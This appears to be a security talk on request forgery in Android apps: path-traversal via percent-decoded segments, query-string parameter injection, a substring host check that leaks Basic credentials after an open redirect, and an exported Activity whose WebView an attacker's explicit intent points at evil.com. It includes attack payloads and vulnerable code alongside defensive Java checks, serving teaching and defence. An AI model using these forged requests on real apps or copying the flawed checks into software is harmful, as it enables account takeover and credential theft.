Exploiting Request Forgery on Mobile Applications

init();

Request Forgery

Deep links are evil. No, not WebView again.

// Path-segment parsing in the HTTP client: the path is split on '/' and every
// segment is percent-decoded before it is added, so an encoded "%2E%2E" becomes
// ".." and can be resolved against the segments that precede it.
static List<String> pathSegments(String path) {
    List<String> segmentBuilder = new ArrayList<>();
    int previous = 0;
    int current;
    while ((current = path.indexOf('/', previous)) > -1) {
        // This check keeps us from adding a segment if the path starts
        // '/' and an empty segment for "//".
        if (previous < current) {
            String decodedSegment
                = decode(path.substring(previous, current)); // percent-decodes the segment
            segmentBuilder.add(decodedSegment);
        }
        previous = current + 1;
    }
    return segmentBuilder;
}

What comes after forging the path?

The legitimate request carries the parameter in the body:

POST /change HTTP/1.1
....

password=123456

An attacker who controls the path, but not the body, appends a query string to it. Frameworks that read parameters from either location accept this as the same request:

POST /change?password=123456 HTTP/1.1
....

GET requests? Is there any way to exploit those?

{
    "username": "dphoeniixx",
    "about": "<h1>Hello on my profile</h1>", // XSS?
    "resumes_uri": "/resumes/dphoeniixx-id", // another request forgery!
    "something_will_be_downloaded": "https://examples.com/files/resumes(.zip|cvs)" // overwrite files!
}
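The forgery on the two slides above, worked through as an added example that is not code from the talk: a hypothetical client concatenates a caller-controlled value into a URL template and resolves it the way the segment loop shown earlier does (split on '/', percent-decode each segment, then apply "." and ".."). The base URL, the /v1/users/{id}/resumes template, the /change endpoint and the resumes_uri value are all assumptions made for the demonstration. The same buildUrl() also shows the profile JSON's resumes_uri being used verbatim as the next request path.

```java
import java.io.ByteArrayOutputStream;
import java.nio.charset.StandardCharsets;
import java.util.ArrayDeque;
import java.util.Deque;

/** Added example (not from the talk): how a forged path value rewrites the request. */
public class PathForgeryDemo {

    // Minimal percent-decoder; unlike URLDecoder it leaves '+' alone.
    static String percentDecode(String s) {
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            if (c == '%' && i + 2 < s.length()) {
                int hi = Character.digit(s.charAt(i + 1), 16);
                int lo = Character.digit(s.charAt(i + 2), 16);
                if (hi >= 0 && lo >= 0) {
                    out.write((hi << 4) | lo);
                    i += 2;
                    continue;
                }
            }
            byte[] b = String.valueOf(c).getBytes(StandardCharsets.UTF_8);
            out.write(b, 0, b.length);
        }
        return new String(out.toByteArray(), StandardCharsets.UTF_8);
    }

    // Models the client from the slide: the first '?' starts the query string,
    // the path is split on '/', every segment is percent-decoded, and "." / ".."
    // are resolved against the segments collected so far.
    static String buildUrl(String base, String relative) {
        String query = "";
        int q = relative.indexOf('?');
        if (q >= 0) {
            query = relative.substring(q);
            relative = relative.substring(0, q);
        }
        Deque<String> segments = new ArrayDeque<>();
        for (String raw : relative.split("/")) {
            if (raw.isEmpty()) continue;                 // leading '/' and "//"
            String seg = percentDecode(raw);
            if (seg.equals(".")) continue;
            if (seg.equals("..")) {
                if (!segments.isEmpty()) segments.removeLast();
                continue;
            }
            segments.addLast(seg);
        }
        StringBuilder sb = new StringBuilder(base);
        for (String seg : segments) sb.append('/').append(seg);
        return sb.append(query).toString();
    }

    // Hardened check for a single path parameter: decode first, then reject
    // dot segments and every delimiter that could change where the value ends.
    static boolean isSafePathParam(String value) {
        String decoded = percentDecode(value);
        if (decoded.isEmpty() || decoded.equals(".") || decoded.equals("..")) return false;
        for (char c : decoded.toCharArray()) {
            if (c == '/' || c == '\\' || c == '?' || c == '#') return false;
        }
        return true;
    }

    public static void main(String[] args) {
        String base = "https://api.example.com";              // hypothetical API
        String template = "/v1/users/{id}/resumes";           // hypothetical endpoint

        // 1. Honest value: the request goes where the template says.
        String benign = "dphoeniixx-id";
        // 2. Forged value: encoded dot segments climb out of /v1/users, a literal '?'
        //    turns the rest of the template into the query string, and the parameter
        //    that normally lives in the POST body is now supplied in the URL.
        String forged = "%2E%2E/%2E%2E/change?password=123456&x=";
        // 3. A profile field (resumes_uri) that the victim's client uses verbatim as
        //    its next request path: whoever controls the profile picks the endpoint.
        String resumesUri = "/admin/export?all=1";

        for (String id : new String[] {benign, forged}) {
            String url = buildUrl(base, template.replace("{id}", id));
            System.out.printf("id=%-42s safe=%-5s -> %s%n", id, isSafePathParam(id), url);
        }
        System.out.println("resumes_uri -> " + buildUrl(base, resumesUri));
    }
}
```

The forged id resolves to https://api.example.com/change?password=123456&x=/resumes: the trailing /resumes from the template is pushed into the query string, where it is harmless, and the password parameter arrives in the URL. The check in isSafePathParam() decodes before inspecting, which is the order that matters: validating the raw value would let %2E%2E through.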

No control over the endpoint's response? An open redirect is very helpful!

// OkHttp Authenticator: called when a response carries a 401 challenge, and it
// attaches Basic credentials to whatever request drew the challenge, including
// a request that got there by following a redirect.
protected Authenticator getBasicAuth(final String username, final String password) {
    return new Authenticator() {
        @Override
        public Request authenticate(Proxy proxy, Response response) throws IOException {
            String credential = Credentials.basic(username, password);
            // Substring match: "www.whitelist.com.evil.com" also passes, so after an
            // open redirect the credentials are sent to the attacker's host.
            if (response.request().url().host().contains("www.whitelist.com")) {
                return response.request().newBuilder().header("Authorization", credential).build();
            } else {
                return response.request();
            }
        }
        @Override
        public Request authenticateProxy(Proxy proxy, Response response) throws IOException {
            return null;
        }
    };
}

We aren't done yet!

Special Cases

<!-- Exported, as a BROWSABLE deep-link target has to be: any installed app can start it. -->
<activity android:exported="true" android:name="com.example.MainActivity">
    <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
    </intent-filter>
    <!-- These constraints are only applied when matching implicit intents. -->
    <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.DEFAULT"/>
        <category android:name="android.intent.category.BROWSABLE"/>
        <data android:scheme="https"/>
        <data android:host="whitelist.com"/>
    </intent-filter>
</activity>

// The Activity trusts the intent filter and loads whatever URI it was started with.
// webView is the Activity's WebView from its layout.
@Override
protected void onCreate(Bundle bun) {
    super.onCreate(bun);
    webView.loadUrl(getIntent().getData().toString());
}

// Attacker's app: an explicit intent names the component directly, so the
// scheme/host filter is never consulted and the action does not even have
// to be VIEW. The WebView above ends up loading https://evil.com/.
Intent evil = new Intent(Intent.ACTION_MAIN);
evil.setData(Uri.parse("https://evil.com/"));
evil.setComponent(new ComponentName("com.example", "com.example.MainActivity"));
startActivity(evil);
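The decision the Activity should make before calling loadUrl(), as an added example that is not code from the talk. The check is isolated in a plain-Java method so it runs outside Android; it uses java.net.URI rather than android.net.Uri, and the allowed scheme and host are assumptions mirroring the manifest above. The main() runs it against the explicit intent from the slide and a few other constructed inputs.

```java
import java.net.URI;
import java.net.URISyntaxException;

/** Added example (not from the talk): re-check action and URL inside the exported Activity. */
public class DeepLinkGuard {
    static final String ALLOWED_SCHEME = "https";        // mirrors android:scheme
    static final String ALLOWED_HOST = "whitelist.com";  // mirrors android:host

    /**
     * True only for a VIEW intent whose URL is exactly on the allow-listed origin.
     * Explicit intents reach an exported Activity without any intent-filter matching,
     * so neither the action nor the URL can be trusted to satisfy the manifest.
     */
    static boolean shouldLoad(String action, String dataUri) {
        if (!"android.intent.action.VIEW".equals(action)) return false;   // rejects the ACTION_MAIN trick
        if (dataUri == null) return false;
        URI uri;
        try {
            uri = new URI(dataUri);
        } catch (URISyntaxException e) {
            return false;
        }
        if (uri.getHost() == null) return false;                            // opaque or host-less URIs
        if (!ALLOWED_SCHEME.equalsIgnoreCase(uri.getScheme())) return false;
        if (uri.getUserInfo() != null) return false;                        // "whitelist.com@evil.com" style input
        return ALLOWED_HOST.equalsIgnoreCase(uri.getHost());                // whole host, not a substring
    }

    public static void main(String[] args) {
        String[][] cases = {
            {"android.intent.action.VIEW", "https://whitelist.com/profile"},     // legitimate deep link
            {"android.intent.action.MAIN", "https://evil.com/"},                 // the explicit intent from the slide
            {"android.intent.action.VIEW", "https://evil.com/"},                 // explicit intent with the right action
            {"android.intent.action.VIEW", "https://whitelist.com.evil.com/"},  // host-prefix confusion
            {"android.intent.action.VIEW", "https://whitelist.com@evil.com/"},  // userinfo trick
            {"android.intent.action.VIEW", "http://whitelist.com/"},            // scheme downgrade
            {"android.intent.action.VIEW", "javascript:alert(1)"},              // no host at all
        };
        for (String[] c : cases) {
            System.out.printf("%-28s %-36s -> %s%n", c[0], c[1], shouldLoad(c[0], c[1]) ? "load" : "reject");
        }
    }
}
```

In onCreate() this becomes: read getIntent().getAction() and getIntent().getData(), pass the action and the data's toString() (or null when the data is absent) to shouldLoad(), and finish() without touching the WebView when it returns false. On Android, android.net.Uri offers getScheme(), getHost() and getUserInfo() for the same checks. Setting android:exported to false is not an option for a BROWSABLE target, so the Activity itself has to enforce what the intent filter only promises for implicit intents.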

First case study

Finally